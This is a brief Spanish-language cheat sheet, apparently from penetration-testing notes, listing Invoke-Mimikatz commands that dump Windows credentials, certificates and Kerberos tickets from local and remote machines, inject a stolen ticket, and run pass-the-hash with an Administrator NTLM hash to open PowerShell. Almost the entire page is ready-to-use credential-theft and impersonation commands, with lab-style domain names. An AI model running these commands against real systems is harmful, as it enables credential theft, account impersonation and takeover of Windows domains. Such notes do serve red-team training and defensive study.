Mimikatz & PassTheHash

Mimikatz

Es la herramienta más usada para extraer hashes y contraseñas de máquinas Windows, que podemos obtener desde su repositorio.

Las credenciales del dominio se almacenan en el fichero ntds.dit en la máquina del Domain Controller (DC).

  • Obtener credenciales en la máquina local

Invoke-Mimikatz -DumpCreds
  • Obtener certificados en la máquina local

Invoke-Mimikatz –DumpCerts
  • Obtener credenciales de varias máquinas remotas

Invoke-Mimikatz -DumpCreds -ComputerName @("sys1","sys2")
  • Exportar todos los tickets de la máquina

Invoke-Mimikatz -Command '"kerberos::list /export"'
  • Listar los tickets de los usuarios autenticados en la máquina local

Invoke-Mimikatz –Command '"sekurlsa::tickets"'
  • Listar claves de cifrado de Kerberos

Invoke-Mimikatz –Command '"sekurlsa::ekeys"'
  • Inyectar ticket

Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@domain.local@DOMIAIN.LOCAL_cifs~dcorpmssql.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL.kirbi"'

Pass The Hash (PTH)

Usa el hash NTLM de un usuario para suplantar su identidad. En este caso también abre una consola de powershell.

Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:domain.local /ntlm:<ntlmhash> /run:powershell.exe"'

Last updated